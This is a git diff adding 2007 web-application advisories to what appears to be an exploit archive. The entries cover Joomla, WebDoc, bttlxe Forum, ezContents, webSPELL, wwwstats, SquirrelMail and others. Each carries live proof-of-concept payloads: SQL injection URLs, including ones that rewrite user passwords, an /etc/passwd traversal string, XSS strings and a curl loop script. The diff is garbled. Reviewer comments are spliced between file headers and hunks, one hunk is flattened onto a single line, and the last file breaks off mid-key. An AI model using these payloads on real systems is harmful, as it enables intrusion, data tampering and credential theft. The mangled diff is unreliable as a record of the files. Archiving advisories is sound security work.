diff --git a/files.csv b/files.csv
index 7029c4f2b..482f83658 100755
--- a/files.csv
+++ b/files.csv
@@ -27681,3 +27681,18 @@ id,file,description,date,author,platform,type,port
 30845,platforms/asp/webapps/30845.txt,"Absolute News Manager .NET 5.1 getpath.aspx Direct Request Error Message Information",2007-12-04,"Adrian Pastor",asp,webapps,0
 30846,platforms/php/webapps/30846.txt,"phpMyChat 0.14.5 chat/deluser.php3 LIMIT Parameter XSS",2007-12-04,beenudel1986,php,webapps,0
 30847,platforms/php/webapps/30847.txt,"phpMyChat 0.14.5 chat/users_popupL.php3 Multiple Parameter XSS",2007-12-04,beenudel1986,php,webapps,0
+30848,platforms/php/webapps/30848.txt,"Joomla 1.5 RC3 com_content index.php view Parameter SQL Injection",2007-12-05,beenudel1986,php,webapps,0
+30849,platforms/php/webapps/30849.txt,"Joomla 1.5 RC3 com_search Component index.php Multiple Parameter SQL Injection",2007-12-05,beenudel1986,php,webapps,0
+30851,platforms/php/webapps/30851.txt,"VisualShapers ezContents 1.4.5 File Disclosure Vulnerability",2007-12-05,p4imi0,php,webapps,0
+30852,platforms/php/webapps/30852.txt,"Kayako SupportSuite 3.0.32 PHP_SELF Trigger_Error Function Cross-Site Scripting Vulnerability",2007-12-06,imei,php,webapps,0
+30853,platforms/php/webapps/30853.txt,"OpenNewsletter 2.5 Compose.PHP Cross-Site Scripting Vulnerability",2007-12-06,Manu,php,webapps,0
+30854,platforms/php/webapps/30854.sh,"wwwstats 3.21 Clickstats.PHP Multiple HTML Injection Vulnerabilities",2007-12-15,"Jesus Olmos Gonzalez",php,webapps,0
+30855,platforms/asp/webapps/30855.txt,"WebDoc 3.0 Multiple SQL Injection Vulnerabilities",2007-12-07,Chrysalid,asp,webapps,0
+30857,platforms/php/webapps/30857.txt,"webSPELL 4.1.2 usergallery.php galleryID Parameter XSS",2007-12-10,Brainhead,php,webapps,0
+30858,platforms/php/webapps/30858.txt,"webSPELL 4.1.2 calendar.php Multiple Parameter XSS",2007-12-10,Brainhead,php,webapps,0
+30859,platforms/php/webapps/30859.txt,"SquirrelMail G/PGP Encryption Plugin 2.0/2.1 Access Validation And Input Validation Vulnerabilities",2007-12-10,"Tomas Kuliavas",php,webapps,0
+30860,platforms/asp/webapps/30860.txt,"bttlxe Forum 2.0 Multiple SQL Injection and Cross-Site Scripting Vulnerabilities",2007-12-10,Mormoroth,asp,webapps,0
+30861,platforms/php/webapps/30861.txt,"E-Xoops 1.0.5/1.0.8 mylinks/ratelink.php lid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0
+30862,platforms/php/webapps/30862.txt,"E-Xoops 1.0.5/1.0.8 adresses/ratefile.php lid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0
+30863,platforms/php/webapps/30863.txt,"E-Xoops 1.0.5/1.0.8 mydownloads/ratefile.php lid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0
+30864,platforms/php/webapps/30864.txt,"E-Xoops 1.0.5/1.0.8 mysections/ratefile.php lid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0
diff --git a/platforms/asp/webapps/30855.txt b/platforms/asp/webapps/30855.txt
new file mode 100755
index 000000000..2c6cbf954
--- /dev/null
+++ b/platforms/asp/webapps/30855.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26761/info
+
+WebDoc is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+WebDoc 3.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/categories.asp?document_id=37&cat_id=convert(int,(select+@@version));--
\ No newline at end of file
diff --git a/platforms/asp/webapps/30860.txt b/platforms/asp/webapps/30860.txt
new file mode 100755
index 000000000..8cee405ca
--- /dev/null
+++ b/platforms/asp/webapps/30860.txt
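Review bot: The date on the new `30854` row, `2007-12-15`, breaks the otherwise increasing date sequence of the rows around it — `30853` is dated `2007-12-06`, `30855` `2007-12-07`, and the later `30857`–`30864` rows `2007-12-10`. The BID that row references (26759) also sits between those of its neighbours (26745 and 26761), so this looks like a typo for a date in the 2007-12-06/07 range rather than a later publication; the added 30854.sh text carries no date of its own, so the value should be checked against the referenced source. In the same hunk, the descriptions for rows `30848` and `30849` do not reflect the disputed status that the two Joomla files themselves record in their UPDATE paragraph; if this index is what tools search, a marker such as `(disputed)` in those two descriptions would keep the index in step with the files.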
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/26790/info
+
+bttlxe Forum is prone to multiple input-validation vulnerabilities, including SQL-injection issues and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+These issues affect bttlxe Forum 2.0; other versions may also be affected.
+
+http://www.example.com/myaccount/viewProfile.asp?member='update Members set ProfileName='hacked';--
+http://www.example.com/myaccount/viewProfile.asp?member='update Members set Password='hacked';--
+http://www.example.com/myaccount/failure.asp?err_txt=">
\ No newline at end of file
diff --git a/platforms/php/webapps/30848.txt b/platforms/php/webapps/30848.txt
new file mode 100755
index 000000000..92a182c07
--- /dev/null
+++ b/platforms/php/webapps/30848.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/26707/info
+
+Joomla! is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Joomla! 1.5 RC3 is vulnerable; other versions may also be affected.
+
+UPDATE (December 10, 2007): The validity of the issues is being disputed on the Joomla! Bug Tracker. Please see the references for details. Reports indicate that the related message was posted by a Joomla! developer, but this has not been confirmed.
+
+http://www.example.com/index.php?option=com_content&view=somechars'%20+%20'article&id=25&Itemid=28
\ No newline at end of file
diff --git a/platforms/php/webapps/30849.txt b/platforms/php/webapps/30849.txt
new file mode 100755
index 000000000..54833ef63
--- /dev/null
+++ b/platforms/php/webapps/30849.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/26707/info
+
+Joomla! is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Joomla! 1.5 RC3 is vulnerable; other versions may also be affected.
+
+UPDATE (December 10, 2007): The validity of the issues is being disputed on the Joomla! Bug Tracker. Please see the references for details. Reports indicate that the related message was posted by a Joomla! developer, but this has not been confirmed.
+
+http://www.example.com/index.php?searchword=&task=somechars%27+%2B+%27search&option=com_search
+http://www.example.com/index.php?searchword=&task=search&option=somechars%27+%2B+%27com_search
\ No newline at end of file
diff --git a/platforms/php/webapps/30851.txt b/platforms/php/webapps/30851.txt
new file mode 100755
index 000000000..ccf7e32c2
--- /dev/null
+++ b/platforms/php/webapps/30851.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26737/info
+
+VisualShapers ezContents is prone to a vulnerability that allows remote attackers to display the contents of arbitrary local files in the context of the webserver process.
+
+An attacker can exploit this issue to retrieve potentially sensitive information that may aid in further attacks.
+
+This issue affects ezContents 1.4.5; other versions may also be vulnerable.
+
+http://www.example.com/ezcontents1_4x/index.php?link=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
\ No newline at end of file
diff --git a/platforms/php/webapps/30852.txt b/platforms/php/webapps/30852.txt
new file mode 100755
index 000000000..1b087c309
--- /dev/null
+++ b/platforms/php/webapps/30852.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26744/info
+
+SupportSuite is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+SupportSuite 3.00.32 is affected by this issue; other versions may also be vulnerable.
+
+http://www.example.com/SupportSuite/upload/includes/LoginShare/modernbill.login.php/%3Cscript%3Ealert(1)%3C/script%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/30853.txt b/platforms/php/webapps/30853.txt
new file mode 100755
index 000000000..bf15e6132
--- /dev/null
+++ b/platforms/php/webapps/30853.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26745/info
+
+OpenNewsletter is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+OpenNewsletter 2.5 is vulnerable; other versions may also be affected.
+
+http://www.example.com/path/to/opennewsletter/compose.php?type=html'%3Ch1%3EXSS!%3C/h1%3E http://www.example.com/path/to/opennewsletter/compose.php?type=';%3CSCRIPT%3Ealert(String.fromCharCode(88,%2083,%2083,%2032,%2058,%2040))//\';%3C/script%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/30854.sh b/platforms/php/webapps/30854.sh
new file mode 100755
index 000000000..3105a6401
--- /dev/null
+++ b/platforms/php/webapps/30854.sh
@@ -0,0 +1,22 @@ +source: http://www.securityfocus.com/bid/26759/info + +The 'wwwstats' program is prone to multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input data. + +Exploiting these issues may allow an attacker to execute HTML and script code in the context of the affected site, to steal cookie-based authentication credentials, or to control how the site is rendered to the user; other attacks are also possible. + +Versions prior to wwwstats 3.22 are vulnerable. + +#!/bin/sh +#jolmos (at) isecauditors (dot) com + +if [ $# -ne 4 ] +then + echo "Usage: $0 + " + echo "Example: $0 http://www.example.com/wwwstats + 100" + exit +fi + +echo 'Attacking, wait a moment' +for i in `seq 1 $3`; do curl "$1/clickstats.php?link=$2" -e 'attack'; done \ No newline at end of file diff --git a/platforms/php/webapps/30857.txt b/platforms/php/webapps/30857.txt new file mode 100755 index 000000000..6dfbc896d --- /dev/null +++ b/platforms/php/webapps/30857.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/26787/info + +webSPELL is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +webSPELL 4.01.02 is affected; other versions may also be vulnerable. + +http://www.example.com/[PATH]/index.php?site=usergallery&action=upload&galleryID=">[your code] \ No newline at end of file diff --git a/platforms/php/webapps/30858.txt b/platforms/php/webapps/30858.txt new file mode 100755 index 000000000..318be0484 --- /dev/null +++ b/platforms/php/webapps/30858.txt 
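Review bot: The two usage strings inside the `if [ $# -ne 4 ]` block, `"Usage: $0 + "` and `"Example: $0 http://www.example.com/wwwstats + 100"`, appear to have lost their argument placeholders — the stray `+` and dangling quotes read like remnants of angle-bracketed tokens stripped on import, and the hunk's declared 22 lines only add up if each `echo` was split across two lines — so the archived file no longer documents which arguments it expects. The guard also requires exactly four positional parameters while the body only reads `$1`, `$2` and `$3`, and with the placeholders gone it cannot be told from the hunk which of the two reflects the original. Both points suggest the entry was mangled in transit; it is worth re-checking the file against the referenced BID 26759 source before committing it in this form.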
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/26787/info
+
+webSPELL is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+webSPELL 4.01.02 is affected; other versions may also be vulnerable.
+
+http://www.example.com/[PATH]/index.php?site=calendar&action=announce&upID=">[your code]
+http://www.example.com/[PATH]/index.php?site=calendar&action=announce&tag=">[your code]
+http://www.example.com/[PATH]/index.php?site=calendar&action=announce&month=">[your code]
+http://www.example.com/[PATH]/index.php?site=calendar&action=announce&userID=">[your code]
+http://www.example.com/[PATH]/index.php?site=calendar&action=announce&year=">[your code]
\ No newline at end of file
diff --git a/platforms/php/webapps/30859.txt b/platforms/php/webapps/30859.txt
new file mode 100755
index 000000000..faaa6a129
--- /dev/null
+++ b/platforms/php/webapps/30859.txt
@@ -0,0 +1,33 @@
+source: http://www.securityfocus.com/bid/26788/info
+
+The G/PGP encryption plugin for SquirrelMail is prone to an input-validation vulnerability and an access-validation vulnerability.
+
+Attackers can exploit these issues to inject arbitrary script code into public key data or to delete and overwrite arbitrary files with the privileges of the application.
+
+SquirrelMail G/PGP Encryption Plugin 2.0, 2.0.1, and 2.1 are vulnerable; other versions may also be affected.
+
+NOTE: One or more of these issues may already have been documented in the following BIDs, but we don't have enough information at this time to distinguish among them:
+
+- 24782, SquirrelMail G/PGP Encryption Plug-in Unspecified Remote Command Execution Vulnerability
+- 24828, SquirrelMail G/PGP Encryption Plug-in Multiple Unspecified Remote Command Execution Vulnerabilities
+- 24874, SquirrelMail G/PGP Encryption Plug-in Multiple Remote Command Execution
+Vulnerabilities
+
+Message-ID: <50453.10.0.0.1.1192345884.squirrel@mail.example.org>
+Date: Sun, 14 Oct 2007 10:11:24 +0300 (EEST)
+Subject: Test mail with SquirrelMail GPG 2.1 POC exploit
+From: test@example.org
+
+Test mail with SquirrelMail GPG 2.1 JavaScript exploit
+
+-----BEGIN PGP PUBLIC KEY BLOCK-----
+Version: GnuPG v1.4.6 (GNU/Linux)
+
+">
+